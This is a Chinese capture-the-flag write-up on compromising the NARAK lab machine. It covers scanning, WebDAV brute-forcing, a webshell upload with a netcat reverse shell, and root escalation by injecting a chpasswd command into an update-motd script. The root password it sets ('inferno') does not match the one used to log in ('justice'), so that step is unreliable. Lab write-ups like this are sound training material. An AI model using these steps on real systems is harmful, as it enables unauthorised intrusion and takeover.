靶机:NARAK
kali : 192.168.71.128
靶机 :192.168.71.129
渗透流程:
- 探测靶机ip地址
命令:fping -aqg 192.168.71.0/24
2. nmap进行靶机端口服务扫描
命令:nmap -sC -sV 192.168.71.129 -n -vv -min-rate=2000
3.进行web页面登录
通过查看网页源码,可见没有什么可以利用的
目录扫描
使用kali中的dirb工具进行目录扫描:
命令: dirb http://192.168.71.129
通过扫描后,查看发现了有一个webdav目录。
192.168.71.129/webdav
然后去访问这个目录试试,发现需要用户名密码登录。
这时,我们使用kali 下的cewl 字典生成工具 爬取该页面存在的密码,生成一个password.txt 文件。
命令:cewl 192.168.71.129 -w password.txt
密码本爆破
账号: yamdoot
密码: Swarg
上传webshell.php
命令:put webshell.php
上传成功之后,需要访问192.168.71.129建立反向连接,访问网站之前开启监听,监听命方法如下:nc -lvvp 4444
重新去访问:192.168.71.129/webdav ,点击刚刚上传的 webshell.php
看到如下情况说明成功回弹webshell
通过python进行交互:
python3 -c ‘import pty;pty.spawn(“/bin/bash”)’
注:这里的引号都是需要英文状态下输入
可以看到home下有三个用户:inferno 、narak、yamdoot
发现了/mnt 目录下 的 hell.sh 文件
通过 登录 BF 在线解码
网址:https://www.splitbrain.org/services/ook
通过点击 Brainfuck to Text 进行解码得到 chitragupt
依次使用home家目录下的用户名,以及BF解码后的密码进行提权;
用户名:inferno
密码为:chitragupt
当尝试到切换到 用户名为 inferno 进行su 提权 时可以成功登录
ls 发现user.txt文件
cat查看txt文件,得到Flag;
5. 提权:
修改00-header
echo "echo 'root:inferno'|sudo chpasswd" >> /etc/update-motd.d/00-header
退出重新登录,su root刚刚更改的密码:
su - root
password:justice